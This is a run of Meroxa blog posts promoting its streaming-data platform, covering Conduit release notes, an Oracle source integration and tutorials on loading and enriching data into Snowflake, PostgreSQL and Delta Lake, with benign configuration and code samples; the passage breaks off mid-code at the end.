Meroxa is a platform as a service that enables developers to declaratively orchestrate end-to-end streaming data movement and processing via a programming language of their choice. All of the needed functionality is encapsulated in an application framework called Turbine. Developers build, test, and deploy their Turbine applications to the Meroxa platform— and the platform takes care of the rest. The Turbine framework not only enables integration with popular tools and platforms, but it also supports the use of highly specialized tools, such as thatDot Novelty Detector.

Let’s look at two typical use cases for Meroxa, seeing how it enables easy stream processing between two distinct systems.

Streaming changes in real-time from MongoDB to Apache Kafka

A Change Data Capture (CDC) connector is created from the Meroxa platform and applied to a MongoDB Atlas-hosted database. That connector is used by a Turbine Stream Processing Data App that receives changes in real-time and publishes them as a stream. The Turbine library enables developers to write transformations on this stream, which then continues to a downstream Kafka cluster.

Real-time data migration and transformation from PostgreSQL to MongoDB

In this Turbine app, developers create a CDC connector and apply it to a PostgreSQL database to receive real-time updates and publish them in the form of a stream. The Turbine application can perform transformations as necessary and then subsequently stream this data to MongoDB in real-time.

Following a recent update, Meroxa has gone a step further to provide developers with real-time visualization tools, allowing them to see what’s happening behind the scenes in their deployed Turbine applications. Developers can see through dashboards and visualizations how data flows from sources through processing functions and on to destinations.

Conclusion

The risks associated with vendor lock-in often outweigh the benefit of simplicity that comes with using a single vendor. Organizations have long faced the consequences of vendor lock-in, and they see the value of taking the necessary steps to avoid being stuck with the wrong vendor for the job.

In this post, we’ve highlighted the difficulty that comes with transitioning from a vendor when it no longer aligns well with your business or technological requirements. While we considered the steps you can take to minimize the risk, vendor lock-in is always a possibility.

Fortunately, Meroxa provides enterprises with tools to liberate their data, decoupling that data from any specific vendor. Tools such as Conduit and Meroxa help with data integration, data movement, and data processing, within and across all cloud services and providers.

To see how Meroxa can solve vendor lock-in concerns specific to your organization, schedule a call with our experts.

Introducing Conduit 0.6

Rimas Silkaitis — Tue, 11 Apr 2023 13:00:00 GMT

With Conduit 0.6, we’re inching closer to the 1.0 release. Conduit is an important building block in the Meroxa platform to stream data from and to a variety of data stores. Starting with Conduit 0.5, we’ve made a concerted effort to focus on features and bug fixes that help developers as they operate Conduit in production environments. This is true for the Meroxa platform and those that use Conduit today.

Significant Features

More ways to install Conduit

Let’s face it. There’s so many different ways a Developer or a DevOps team wants to install software on their machines or in a production environment. That’s why all of our releases starting with 0.6 will have the ability to be installed via:

Connector Lifecycle Events

Before Conduit 0.6, if you wanted to build a Conduit connector, the connector needed to be able to respond to a handful of events from Conduit itself, `Configure`, `Open`, `Read`, `Write`, `Ack`, or `Teardown`. These events would get emitted to the connector through the invocation of a pipeline. At first, these events seem more than enough to cover the needs of various data stores and ways to connect to them. In practice, these weren’t enough to cover extra actions that a connector might want to take. Let’s say you wrote a Change Data Capture connector for Postgres. In this connector you need to open a replication slot on the database and close the slot when you’re done streaming data. With the new lifecycle events, you could open the replication slot in a Source `OnCreate` event and when the connector shuts down you can close the slot in the Source `OnDelete` event.

In Conduit 0.6, we’ve introduced a few more events throughout the connector’s lifecycle. These events include:

Source OnCreate
Source OnUpdate
Source OnDelete
Destination OnCreate
Destination OnUpdate
Destination OnDelete

With these extra events, you’ll now be able to have more control over when and what your connector does when Conduit includes it in a pipeline. If you want more information about it, check the original Design Doc and the associated issues.

Parallel Processors

In Conduit Pipelines when you wanted to add a processor, that processor would sequentially process records as they’re pulled from the upstream data source. With the release of Parallel Processors, you now have the ability to specify a number of workers and Conduit will process incoming records across the processor workers. This allows processors to keep up with high data velocity pipelines. Keep in mind that for the data coming into the processor the data may get processed by processor workers out of order but the records will flow out of the processor in the order that they came in.

To kick the tires on this, you’ll need to include the number of `workers` you want in your pipeline configuration file:

version: 2.0

pipelines:
  - id: pipeline1
    processors:
      - id: proc1
        type: js
        workers: 1

If you don’t include `workers` in your processor definition, the default will be `1`.

To learn more about Parallel Processors, go check out the PR!

Looking forward to 1.0

One of our main principles on the Conduit team is to make sure that what we say Conduit does is actually what you get. This is why we’ve been so focused on making sure operating Conduit is as expected. In terms of feature development, we want 1.0 to signify that Conduit won’t have any major breaking changes. This provides guarantees around how you can expect to interface with and develop against Conduit. As of this time, we don’t expect any major breaking changes to the internal APIs of Conduit and the connector spec. Once we spend more time with Conduit in Meroxa’s production environment, we’ll be able to gather the information we need to know if those APIs will need to change.

So what does the next set of capabilities and features look like? We’re diligently working on a Conduit Kubernetes Operator. For advanced production environments, this will make running a Conduit service that much easier with all of the needed behaviors around starting, stopping, and restarting pipelines all built-in. But that’s just one of the many capabilities we’re looking to add before we get to 1.0, check out all of the milestones in GitHub for more information.

We’d love your feedback too!

As we start gearing up for 1.0, we’d love to get your feedback! If you want to see the full list of what was included in this release, check out the Conduit Changelog and the documentation. Also, feel free to join us on Discord or Twitter.

If Data is the New Oil, Why isn't Data a Commodity?

Keith Haller — Fri, 17 Mar 2023 00:36:45 GMT

If you drive a Tesla or any other electric vehicle, you realize the cost and limitations when a utility such as electricity is not available as a commodity. Electric vehicle owners today are limited to only having access to electricity from a single proprietary delivery platform. As a result, electric vehicle owners spend more money to access what should be a commodity.

Similarly, cloud storage was supposed to be a utility, but it has the same proprietary access with limited integrations. Cloud vendors today allow access to data, as long as it's stored or accessed from their cloud, requiring users to exclusively use their cloud services. As a result, very few companies enjoy the benefits of multi-cloud and are locked into using a single cloud provider. We know this is true due to the increasing number of Chief Cloud Economist roles being established to oversee the costs associated with cloud services.

What should be a commodity like oil is instead locking customers into high prices, and ultimately limiting potential for innovation and a multi-cloud enterprise strategy. Cloud data storage itself is not proprietary, but since the integrations built to support that cloud storage is proprietary, data cannot be a commodity and is therefore nothing like oil.

So how do cloud platform vendors have you over the barrel?

Cloud vendors have you tied to their platform, simply because all the integrations to that data are customized, limited, and proprietary to only their cloud platform. You may want to purchase another cloud vendor, but you can’t because the integration stack only works for their cloud.

Unfortunately, cloud storage vendors will never provide multi-cloud integrations, making it challenging for customers to compare and choose a storage provider based on features and price. Cloud vendors don’t want multi-cloud environments, because having proprietary rights to your data gives them an advantage by locking you in, resulting in a premium to you. It has been and always will be this way. It would be unwise to assume anything different. Additionally, cloud vendors even penalize you for switching/migrating data to another platform.

The cloud lock-in becomes painfully apparent when your Cloud Utility bill reaches millions of dollars, and there becomes a need to develop new skills within the organization for cloud accounting.

Source: https://www.infoworld.com/article/3689813/cloud-trends-2023-cost-management-surpasses-security-as-top-priority.html

In order for cloud storage to truly be as valuable as oil, you have to have a multi-cloud strategy from a neutral third-party vendor.

What is an example of a successful third-party vendor and how will that change in the next 3 years?

Informatica is a good example of a neutral 3rd party vendor that enabled uniform integration with multiple data stores. Before Informatica became an enterprise leader in ETL, the Relational Database Management System (RDBMS) vendors (i.e. Oracle, Sybase) provided their own ETL tool that was customized for only their RDBMS. Customers gained tremendously by using a neutral third-party vendor such as Informatica, which allowed standardization of data integrations across all RDBMS. Informatica enabled data became more of a commodity across storage platforms. Similarly, today, data needs to become more of a commodity across clouds and data lakes.

The actual cost of proprietary single cloud storage is the loss of competitive advantage to companies that transition from “platform-led” to “developer-led” discovery.

If you overspend on cloud resources because you have no choice and all your integrations are proprietary, you will have to resort to only looking at data that is absolutely needed. That has always been the downside of a “platform-led” approach to discovery. The cost of cloud will limit your ability to experiment with and explore new data. All the data that your business users suspect might be valuable but aren’t sure about because it’s too expensive to evaluate, will be left behind. However, companies that transition to “developer-led” will figure out how to make the cloud a utility, and can then afford discovery and exploration. They will have tools that enable a top-down, “developer-led” flexible approach to triaging data.

Meanwhile, your company will unfortunately be stuck with a lock-and-load “platform-led” approach with a single cloud vendor that performs queries at incredible speeds, but also at incredible costs and rigidity. There has always been too much emphasis on optimizing the vendor platform per known queries and not enough focus on supporting discovery and exploration. Data platforms have never focused on new data that business users might find valuable. This “platform-led” approach never afforded the luxury of storing everything that anybody thought might be valuable and then hoping for the best. To remain competitive, companies need to change how they approach data discovery and exploration. Modern data architectures will have to move towards a more flexible and open “developer-led” approach that allows for experimentation and discovery.

The innovations needed will occur at the front-end of integration with the business user, not at the storage end. This will be explored further in my next blog.

How do you create a neutral data integration strategy that is not biased toward a single cloud or even toward a cloud at all?

Enabling a multi-cloud design and reducing cloud costs doesn’t need to be difficult. Using the right tool that gives you the flexibility to work with your data regardless of where it lives can help you create a neutral data integration strategy. At Meroxa, we offer a code-first approach to data integration, resulting in cloud neutrality and making data a commodity just like oil.

What makes Meroxa different than other platforms:

Code-First - Developers of any skill level can build data products in the language of their choice with the ultimate flexibility that code provides. Companies do not need subject matter experts to work with their data. In just 4 lines of code you can move data around like a commodity, to and from any cloud vendor.
Open-Source - Built on open-source technology this gives enterprises the security and flexibility they need. No vendor lock-in & connectors for any data store (databases, cloud, SaaS apps, APIs, data lakes, and messaging systems) make it simple for organizations to readily access that data and work with it. Reliable production-ready connectors for any data can be built in warp speed using our open-source libraries.
Easily manage hundreds of integrations - Meroxa automatically creates a shared data stream catalog and embeds it into your workflows so you can search, find, and reuse data streams effortlessly across all the programming languages. Building scalable and reusable development artifacts across clouds, programming languages and projects makes developing with data significantly faster than traditional approaches.
Build, Test, Iterate, Deploy - Build your stream processing application using a language of your choice, test with data samples that reflect your production environment, iterate as many times as needed, and then deploy your application, ultimately reaching business conclusions quicker with minimal effort and resources.

Conclusion

Meroxa is the only independent streaming integration vendor critical to be able to treat data like oil, because we have a unique and disruptive code-first approach.

“You can manage the cloud vendors, or they will manage you. Meroxa gives you that with just 4 lines of code.”

Meroxa can help turn your data into a commodity. Companies that realize the value of a "developer-led" vs. “platform-led” data strategy can quickly reduce their cloud costs and achieve a multi-cloud environment. With Meroxa being the only independent streaming integration platform able to treat data like a commodity, our customers have been able to realize tremendous value. To learn more about how Meroxa can help transform your data strategy, schedule a demo today.

Announcing the Oracle Database Source Data Integration

Sara Menefee — Wed, 15 Mar 2023 14:57:44 GMT

We are excited to announce that the Meroxa Platform now supports data integrations for Oracle Databases.

Oracle Database, also known as Oracle or Oracle DB, is a relational database management system (RDBMS) developed by Oracle Corporation. It is one of the most widely used databases in the world by large enterprise companies that require robust and dependable database solutions to store, process, and access data at a massive scale.

Oracle Database as a Source

Meroxa's Turbine application framework lets you write code naturally by using Meroxa Functions to alter incoming data records and events from an Oracle Database source data stream before arriving at any downstream destinations, whether another database or system. The Turbine application framework supports programming languages such as JavaScript, Python, Ruby, and Go.

When you deploy a Turbine streaming application with an Oracle Database source, the Meroxa Platform takes an initial snapshot of the source table. Once the snapshot is complete, it begins tracking new data records and events, including INSERT, UPDATE, and DELETE operations, and pushes them into the data stream.

Real-Time Data Streaming with Change Data Capture

Using Change Data Capture (CDC), we can process Oracle Database data record events in real-time. We do this by creating a tracking table and a database trigger to track event records.

The tracking table and trigger name have the same names as a source table with the prefix MEROXA. The tracking table has all the same columns as the source table plus three additional columns:


Column name	Description
CONNECTOR_TRACKING_ID	The auto-increment index for the position.
CONNECTOR_OPERATION_TYPE	The operation type, whether INSERT, UPDATE, or DELETE.
CONNECTOR_TRACKING_CREATED_AT	The timestamp of event record creation in the tracking table.

An event record will be written in a tracking table when data is added, changed, or deleted from an Oracle Database table. The queries retrieving these event records from the tracking table are similar to those used in Snapshot mode but with CONNECTOR_TRACKING_ID as the ordering column.

An Ack method will collect the CONNECTOR_TRACKING_ID of the event records successfully applied and are later removed from the tracking table every 5 seconds or when the connection is closed.

Things to be aware of...

Changes sometimes need to be made to columns in an Oracle Database table. The changes must also be applied to the tracking table when this happens by your Oracle Database administrator.
All tracking information only exists within the Oracle Database. Upon deletion of the tracking table, the tracking process will restart from the beginning by initiating a new snapshot of the table, which could lead to unintended replication of data downstream.

Creating an Oracle Database Resource on the Meroxa Platform

Customers can create Resources for Oracle Databases using the Meroxa CLI or Dashboard. You must have a Meroxa account and be logged in to your account to get started.

Meroxa CLI

In the following example, we create an Oracle Database Resource named my-oracle-db. Resource names may contain lowercase letters, numbers, underscores, and hyphens. Use this name to reference your Oracle Database when writing your Turbine application code.

Using the Meroxa CLI, run the following command:

$ meroxa resource create my-oracle-db --type oracle –-url oracle://user:password@host.com:1571/database

Meroxa Dashboard

Below are the steps required to create an Oracle Database Resource using the Meroxa Dashboard:

Navigate to the Resources tab.
Click the Add a Resource button.
Search for Oracle DB using the search bar.
Click the Add Resource button for Oracle DB.
Confirm you are on the Add a resource form with Oracle DB selected.
Provide a valid Resource Name (e.g., my-oracle-db, myoracle, oracle123).
Provide a valid Connection URL for your Oracle Database instance (.e.g., oracle://user:password@host.com:1571/database-name)
Click the Save button.

A notification in the dashboard will appear once your Oracle Database Resource has been successfully created.

Using Oracle Database as a Source with Turbine

Using Turbine, customers can use any Turbine-supported language such as JavaScript, Python, Ruby, or Go to stream and transform business-critical data from an Oracle Database table to any destination.

The following example demonstrates how to do this with TurbinePy using Python.

First, initialize your Turbine streaming app by running the following command in the Meroxa CLI:

$ meroxa app init my-first-app –-lang python

You should receive confirmation from the Meroxa CLI that you've initialized your Turbine streaming app, meaning the application files have been created locally in the current directory.

From this point, run the following command to get to the root of the application code.

$ cd my-first-app

Within your Turbine streaming app you will discover a main.py file. Open this with your preferred code editor. You will see self-documented boilerplate code with a custom function written against the example data record set provided in a fixtures directory.

Look for the following code with the resources and records methods:

source = await turbine.resources("source_name")
records = await source.records("collection_name", {})

The resources method is used to specify a Resource on the Meroxa Platform. Replace source_name with the name of your Oracle Database Resource. In the following example, we’ll use the name we used when creating the Oracle Database Resource my-oracle-db.

source = await turbine.resources("my-oracle-db")

The records method is used to specify the respective table you wish to use as the source of data. In the following example, there is a table called transactions. Replace collection_name with the name of your Oracle Database table.

In addition, you will need to indicate which field will be used for ordering rows. This column must contain unique values that can be used for sorting otherwise, the snapshot will not work properly. In the following example, we will use the id column.

records = await source.records("transactions",{"orderingColumn":"id"})

There are a few additional configurations for Oracle Database Source data integrations that can be defined in your Turbine application code. In the following example, we want to change the batchSize from its default value of 1000 to 2000. We do this by including another key value pairing in the configuration which is the second argument of the records method.

records = await source.records("transactions",{"orderingColumn":"id",”batchSize”:”2000”})

Below is a list of the supported configurations for Oracle Database sources.

Configuration	Requirement	Description	Example value
orderingColumn	Required.	The column name that the connector will use for ordering rows. Column must contain unique values and be suitable for sorting, otherwise the snapshot won't work correctly.	id
snapshot	Optional, default value is true.	Enables or disables snapshots of the entire Oracle DB table before starting Change Data Capture (CDC) mode.	false
batchSize	Optional, default value is 1000.	Sets the size of the rows batch. Min is 1 and max is 100000.	100
keyColumns	Optional.	If the field is empty, the connector makes a request to the database and uses the received list of primary keys of the specified table. If the table does not contain primary keys, the connector uses the value of the orderingColumn field as the keyColumns value.	id,uuid
columns	Optional.	A list of column names that should be included in each record's payload, by default includes all columns.	id,name,age

You’re ready to start streaming with an Oracle Database as a source for your Turbine streaming app!

What's next?

All that's left for you to do is to write function code to transform the streaming data and event records to a downstream set of Resources or third-party APIs.

Need ideas for a Turbine app using Oracle Database as a source? Check out our example Turbine apps to get started. But don't let this example hinder you. The sky's the limit for what you and your team can achieve.

We can’t wait to see what you build! 🚀

As always,

If you need help or have questions, please reach out at support@meroxa.com.
Join our Discord community.
Follow us on Twitter.

Medallion Architecture + Meroxa: Easily Work with Massive Amounts of Data

Eric Cheatham and Tanveet Gill — Fri, 03 Mar 2023 19:32:48 GMT

In today's data-driven world, the challenges of processing and analyzing large amounts of data continue to grow. Traditional data architectures take time to implement and don’t meet the needs of analytics on demand. Many organizations have created their own way to logically represent data as it is processed to help address the ever-increasing challenges of working with data; one such solution is the Medallion Architecture from Databricks.

The Medallion Architecture is a design pattern used to logically organize data in a Data Lakehouse, with the goal of progressively improving the overall quality of the data. It uses the Delta Lake framework to logically organize the data into three layers: Bronze, Silver, and Gold. At each layer, the data is refined to make the curated business-level tables more accessible, accurate, and actionable.

In this blog post, we demonstrate how you can implement the Medallion Architecture using Meroxa and Turbine to streamline analytics and make it easier to work with large amounts of data.

💡 You can read the Databricks primer here to learn more about the Medallion Architecture and how it improves the data.

What is Meroxa?

Meroxa is a Stream Processing Application Platform as a Service (SAPaaS) where developers can run and scale their Turbine apps using cloud-native best practices. Turbine is Meroxa’s stream processing application framework for building event-driven stream-processing apps that respond to data in real-time.

Meroxa handles the underlying streaming infrastructure so developers can focus on building their applications. Turbine applications start with an upstream resource. Once that upstream resource is connected, Meroxa will take care of streaming the data into the Turbine application so it can be run.

Since Meroxa is a developer-first platform, engineers can ingest, orchestrate, transform, and stream data to and from anywhere using languages they already know, such as Go, JavaScript, Python, or Ruby. Support for Java, and C# is on the way.

💡 Meroxa has support for many source and destination resources. You can see which resources are supported here. If there's a resource not listed you can request it by joining our community or by writing to support@meroxa.com. Meroxa is capable of supporting **any** data resource as a connector.

Overview

We want to implement a Delta Lake architecture using Meroxa and Turbine as our transition from Bronze, to Silver, and ultimately to business-level Gold level data stores. To accomplish this we will use the following resources; all managed by the Meroxa platform:

Bronze: PostgreSQL will serve as our raw, unfiltered data ingested from various sources
Silver: Snowflake will serve as our intermediate cleaned and enriched data storage; valuable but not 100% business ready
Gold: Amazon Web Services S3 will be where our business-ready data will live, normalized and stored in the Delta Table format

As a bonus, we will also set up logging using Sentry, an error tracking and monitoring platform, to catch and report any exceptions that come up when writing our data.

Visually, our application will look like this:

Let’s get to the code

But first…

Before we can begin we will need to set up a few things.

First, on the Meroxa Platform we will need both a PostgreSQL resource and a Snowflake resource. Using the documentation we can set up our Bronze PostgreSQL and Silver Snowflake resources.

Secondly, we will need to set up our S3 bucket that will serve as our Delta Table resource. Although we will not need to add our S3 bucket to the Meroxa Platform in this particular example we will still need to set up access permissions as though we were. We can find those permissions in our documentation.

In addition to setting up our resources we will also need to gather a few extra bits of information. We need to set up the following environment variables:


Environment Variable	Description
AWS_ACCESS_KEY_ID	AWS Access Key for user accessing buckets
AWS_SECRET_ACCESS_KEY	AWS Secret for user accessing buckets
AWS_REGION	Region the bucket was created in
AWS_URI	The actual URI of the bucket (e.g.: S3://bucket-name/key-name )
SENTRY_DSN	Sentry Data Source Name (DSN) to upload logs and errors
GOOGLE_API_KEY	API Key to access Google Location API

We will address each one of these variables as we walk through our example.

Writing our Turbine App

Our Turbine application has three main tasks: read our raw data from our Bronze data source, transform our data for Silver intermediate data store, and ultimately write to our Delta Table in our Gold destination.
To start, we first need to retrieve our raw data. Turbine enables us to stream rows, referred to as Records in Turbine, from our Bronze database, in this case a PostgreSQL database from the “employees” table.

Taking a quick look at our raw data, we can see that Turbine has formatted it as JSON.

With our raw data in hand, our next step is to enrich said data. For this example we want to translate the postcode on our record to Latitude and Longitude through the use of Google Address Validation API. This can be accomplished by using the Requests library to make a GET request against the Address Validation and obtain our enhancement.

Notice that nothing in this code is specific to Turbine. The great thing about this code is that it is not Turbine specific. This particular code can be run alone as is.

Another great feature of Turbine is that it allows us to abstract out any logic we want into a separate module so we can keep our code neat and organized. Here we have chosen to move our enrichment logic into a module called enrich.py

We extract the postcode from each Record, a JSON representation of each row in our Bronze database, and enrich it using our previously created logic. Once we’ve set up our processing logic we can use Turbine to execute our logic and write to our Silver database in only three lines of code.
But we still need to write to our Gold database; our Delta Lake. Here we are using delta-rs, a Rust library with Python bindings, to initialize and write to our Delta Lake. Like our enrichment logic from before, this logic contains nothing Turbine specific and can be run on its own. In addition to our Delta writing logic we also use the Sentry SDK to log any errors we may encounter.

Putting It All Together

All that’s left now is to piece it all together in our `main.py` module. Here we see how the Turbine framework helps us connect our source, enrichment logic, and finally our destinations together. Remember the bonus logging we mentioned before? In our complete Turbine application we’ve added an invocation of the sentry_sdk initialization function. Although turbine handles execution of your code for you. Youare more than welcome to bring your own logging tools for that extra bit of insight into how your code is performing.

Deploying our Application

Now let's get our application up and running. Using git and the Meroxa CLI we will run the following commands:

$ git add .
$ git commit -m "Initial Commit"
$ meroxa apps deploy

💡 For more information on deployment, you can refer to the Meroxa Docs here.

While we wait, the Meroxa Platform is hard at work wiring all of our resources together; connecting our Bronze source to our function and our function to our Silver and Gold destinations.

Once our application is deployed we will see that every record that is already in our Bronze source will be written to our Gold and Silver destinations with our updates in hand. The running Turbine application will continue to process all new records as they are written to our Bronze source.

Meroxa sets up the complex connections and polling logic and lets us focus on the real fun part; writing code.

Final Thoughts

The Medallion Architecture and the Delta Lake framework combine to be an incredibly powerful way to organize and augment our data. However, a lot of time and effort is often spent on setting up the infrastructure we need to even begin to make use of this powerful combination.

With Meroxa and Turbine we no longer need to concern ourselves with this complex overhead and instead we can focus on the logic that does the heavy lifting. We’ve seen that with Meroxa and Turbine we are able to:

Stream unstructured data from our Bronze PostgreSQL data source
Augment our data using whatever logic we want and any libraries or APIs we may need
Intermediately warehouse our augmented data in an AWS RedShift Database
Ultimately write our data into an AWS S3 backed Delta Table, ready to be consumed

And we did it all without having to set up any extra infrastructure or streaming logic.

If you're interested in learning more about Meroxa, be sure to check out our documentation and Discord community. We support a wide range of source and destination resources, and you can use languages you already know to ingest, orchestrate, transform, and stream data to and from anywhere.

Thanks for reading, and we hope this post was helpful in your data-driven journey!

Here are some additional examples of what can be accomplished with Meroxa:

Conduit 0.5 is Now Available

Uchenna Anyanwu — Tue, 28 Feb 2023 21:18:23 GMT

Conduit 0.5 is out! Conduit’s a tool to help developers build streaming data pipelines between production data stores and messaging systems. For example, if you’ve ever used tools like Kafka Connect, Conduit can be used as a drop-in replacement to help stream data to Apache Kafka. With this release, the goal was to make Conduit easier to operate as a service. This meant, making an easy-to-configure Dead Letter Queues (DLQ) through HTTP and gRPC, extending health checking, and adding more capabilities with Debezium records. Here’s a look at some of the key enhancements in Conduit 0.5.0 and Conduit 0.5.1.

Stream Inspector

In the Conduit 0.4release, developers could peek at the data as it enters Conduit via source connectors and what the data looks like as it travels to destination connectors. In this release, we have made the stream inspector more complete through the ability to peek at data as it enters or leaves processors by adding methods to the processor interface and endpoints.

Processor inspection is available via the API.

Dead Letter Queues

In Conduit 0.4 we added Dead Letter Queues (DLQs) that can be configured through pipeline configuration files. In 0.5 we extended this feature by exposing the DLQ configuration through the HTTP and gRPC APIs. Additionally, we added two new metrics that help you keep an eye on the behavior of your DLQ - `conduit_dlq_execution_duration_seconds` is a histogram tracking how long it took to insert records into the DLQ and `conduit_dlq_bytes` gives you an insight into the size of the records sent to the DLQ.

Check out more information about Dead Letter Queues in our documentation.

Unwrap a Debezium record into an OpenCDC record

Two main processors were added to Conduit in this release:

1.) Parse Json Processor: some source connectors tend to create a record that has a raw data (an array of bytes that is not human readable) key, a raw data payload, or both, and if we know that these values are JSON formatted, then this processor can convert the raw data values into structured data (map of strings and values).

To parse the key, use `parsejsonkey` processor name.
To parse the payload, use `parsejsonpayload` processor name.

Ex: using the `parsejsonkey` processor, the key can go from looking like this:

record.RawData {
    Raw: [] uint8 {
		0x7b, 0x22, 0x61, 0x66, 0x74, 0x65, 0x72, 0x22, 0x3a, 0x7b, 0x22, 0x64, 0x61, 0x74, 0x61, 0x22, 0x3a, 0x34, 0x2c, 0x22, 0x69, 0x64, 0x22, 0x3a, 0x33, 0x7d, 0x7d
	}
}

To This:

record.StructuredData{
	"after":map[string]interface{} {
    	"data": 4,
        "id": 3,
    }
}

2.) Unwrap Processor: source connectors could create a record with another record wrapped inside the payload, so we provided a processor that unwraps the record from the payload and creates a newOpenCDC record from it. This processor can unwrap two formats:

Debezium: if the payload is a Debezium record, then create a processor with the name “unwrap” and add a configuration “format:debezium” for it. Ex: The record can go from looking like (1) to (2)

(1)

record.Record{
    Metadata: map[string]string{
        "conduit.version": "v0.4.0",
    },
    Payload: record.Change{
        Before: nil,
        After: record.StructuredData{
            "payload": map[string]interface{}{
                "after": map[string]interface{}{
                    "description": "test1",
                    "id": 27,
                },
                "before": interface{}(nil),
                "op": "u",
                "source": map[string]interface{}{
                    "opencdc.version": "v1",
                },
                "transaction": interface{}(nil),
                "ts_ms": float64(1674061777225),
            },
            "schema": map[string]interface{}{},
        },
    },
    Key: record.StructuredData{
        "payload": 27,
        "schema": map[string]interface{}{},
    },
}

(2)

record.Record{
    Operation: record.OperationUpdate,
    Metadata: map[string]string{
        "opencdc.readAt": "1674061777225000000",
        "opencdc.version": "v1",
        "conduit.version": "v0.4.0",
    },
    Payload: record.Change{
        Before: record.StructuredData(nil),
        After: record.StructuredData{
            "description": "test1",
            "id": 27,
        },
    },
    Key: record.RawData{
        Raw: []byte("27"),
    },
}

Kafka Connect: if the payload is a Kafka Connect record, then create a processor with the name “unwrap” and add a configuration “format:kafka-connect” for it. Ex: The record can go from looking like (1) to (2)

(1)

record.Record{
    Payload: record.Change{
        Before: record.StructuredData(nil),
        After: record.StructuredData{
            "payload": map[string]interface{}{
                "description": "test2",
                "id": 27,
            },
            "schema": map[string]interface{}{},
        },
    },
    Key: record.StructuredData{
        "payload": map[string]interface{}{
            "id": 27,
        },
        "schema": map[string]interface{}{},
    },
}

(2)

record.Record{
    Operation: record.OperationSnapshot,
    Payload: record.Change{
        After: record.StructuredData{
            "description": "test2",
            "id": 27,
        },
    },
    Key: record.StructuredData{"id": 27},
}

Note that the `Payload.After` is unwrapped to be the whole record, and the payload from the `Key` is unwrapped too.

Implement health check

The Conduit Health Check can be used to determine if Conduit is running correctly. It determines if Conduit can successfully connect to the database with which it was setup (which can be BadgerDB, PostgreSQL, or the in-memory one). Here’s an example:

$ curl "http://localhost:8080/healthz"

{"status":"SERVING"}

You can also check individual services within Conduit. The following example checks if the PipelineService is running:

$ curl "http://localhost:8080/healthz?service=PipelineService"

{"status":"SERVING"}

And the rest

If you want to see the full list of what was included in this release, check out the Conduit Changelog and the documentation. Also, feel free to join us on Discord or Twitter.

Transformation Part I: Using Meroxa & Google Maps API to enrich & load data into Snowflake in Real-Time

Tanveet Gill — Wed, 22 Feb 2023 16:02:38 GMT

Github Repo

Welcome to Part I of our Transformation series. In this series, we will show you how to use the Meroxa Platform in conjunction with the Turbine Framework to transform, enrich, orchestrate, and analyze data in real-time.

Throughtout the series, we will use a PostgreSQL database with a table called "customers" that has information about our customers and the orders they have made. We will be doing many transformations to enrich this data set in real-time to understand better where our customers are from, engage with them, and visualize our data.

In part I, we will do address enrichment by leveraging the Google Maps API to enrich and validate existing customer address data. Street address locations may have typos, spelling variations, misspellings, and other errors. Google Maps is one of the best sources of location-based addresses; hence, it was chosen as a source of data enhancement and enrichment. Later, we will use this data to plot demographic insights on our customers for business analytics.

What is Meroxa?

Meroxa is a Stream Processing Application Platform as a Service (SAPaaS) where developers can run Turbine applications. Turbine is Meroxa's stream processing application framework for building event-driven stream processing apps that respond to data in real-time and scales using cloud-native best practices. Meroxa handles the underlying streaming infrastructure so developers can focus on building the applications. Turbine applications start with an upstream resource. Once that upstream resource is connected, Meroxa will take care of streaming the data into the Turbine application so it can be run. Since Meroxa is a developer first platform, engineers can ingest, orchestrate, transform, and stream data to and from anywhere using languages they already know, such as Go, JavaScript, Python, or Ruby. Support for Java, and C# is also on the way.

Overview

To get started with enriching and collecting metadata on our customers’ addresses, we will be leveraging the Google Maps geocoding API. If you are unfamiliar with this API, you can check out the Google Maps documentation here. We will use the search API to send in customer address information, which will return a more comprehensive object on the address, such as latitude and longitude.

At a high level, Meroxa will detect changes in your PostgreSQL database via Change Data Capture (CDC). Each record from PostgreSQL will be streamed over to our Turbine application in real-time. In our case, it will take the address and enrich it via the Google Maps API. Once the record has been processed, it will be written to Snowflake.

Take Me To The Code!

To start, you will need the following:

Once you have signed up for Meroxa and set up the Meroxa CLI you can follow the following steps to get up and running:

💡 Here we are creating the resources via the CLI, you can also do so via the Meroxa Dashboard once you are logged in.

Adding your PostgreSQL and Snowflake Resources

PostgreSQL (Guide on configuring PostgreSQL) - Source Resource

Below we are creating a PostgreSQL connection to Meroxa named pg_db.

Note: To support CDC (Change Data Capture) we turn on the logical_replication flag.
```
$ meroxa resource create pg_db \\\\
--type postgres \\\\
--url postgres://$PG_USER:$PG_PASS@$PG_URL:$PG_PORT/$PG_DB \\\\
--metadata '{"logical_replication":"true"}'
```
Snowflake (Guide on setting up Snowflake) - Destination Resource

Below we are creating a Snowflake connection named snowflake.
```
$ meroxa resource create snowflake \\\\
--type snowflakedb \\\\
--url "snowflake://$SNOWFLAKE_URL/meroxa_db/stream_data" \\\\
--username meroxa_user \\\\
--password $SNOWFLAKE_PRIVATE_KEY
```

Initializing Turbine

$ meroxa apps init part-one-google-maps-enrichment --lang js

Writing your Turbine code

Open up your part-one-google-maps-enrichment folder in your preferred IDE. You will get boilerplate code that explains where to code your sources and destinations named in Step 1. In our case we just need to do the following to set the connection between PostgreSQL and Snowflake:

async run(turbine) {
	// First, identify your PostgreSQL source name as configured in Step 1
	// In our case we named it pg_db
    let source = await turbine.resources("pg_db");

    // Second, specify the table you want to read in your PostgreSQL DB
    let records = await source.records("customers");

	// Optional, Process each record that comes in!
    let transformed = await turbine.process(records, this.transform);

    // Third, identify your Snwoflake source name configured in Step 1
    let destination = await turbine.resources("snowflake");

    // Finally, specify which table to write that data to
    await destination.write(transformed, "customer_addresses_enriched");
}

await turbine.tranform allows developers to write a function that will be run on each record. We will preprocess our data before sending it to Snowflake. Below we have our transform function, which loops through each record coming in from the data stream. We are calling the Google Maps API on the address field of every record and generating an address object that contains metadata on the address. Later we write that metadata in a new table to Snowflake.

💡 You can view the complete repository for this data app on Github here.

async transform(records) {
	for (const record of records) {
      	const customer_address = record.get("customer_address")
      	console.log("[DEBUG] customer_address ===> ", customer_address)

      	if (!customer_address || customer_address.length === 0) {
        	console.log("[ERR] customer_address ===> ", customer_address)
        	return
      	}

      	const googleMapsLookupResponse = await googleMapsLookup(customer_address)
      	console.log("[DEBUG] googleMapsLookupResponse ===> ", JSON.stringify(googleMapsLookupResponse))

        if (!googleMapsLookupResponse) {
          console.log("[ERR] googleMapsLookupResponse ===> ", JSON.stringify(googleMapsLookupResponse))
          return
        }

        const address_metadata = generateAddressObject(googleMapsLookupResponse)
        console.log("[DEBUG] address_metadata ===> ", address_metadata)

        record.set("address_metadata", address_metadata)

        for(var key in address_metadata) {
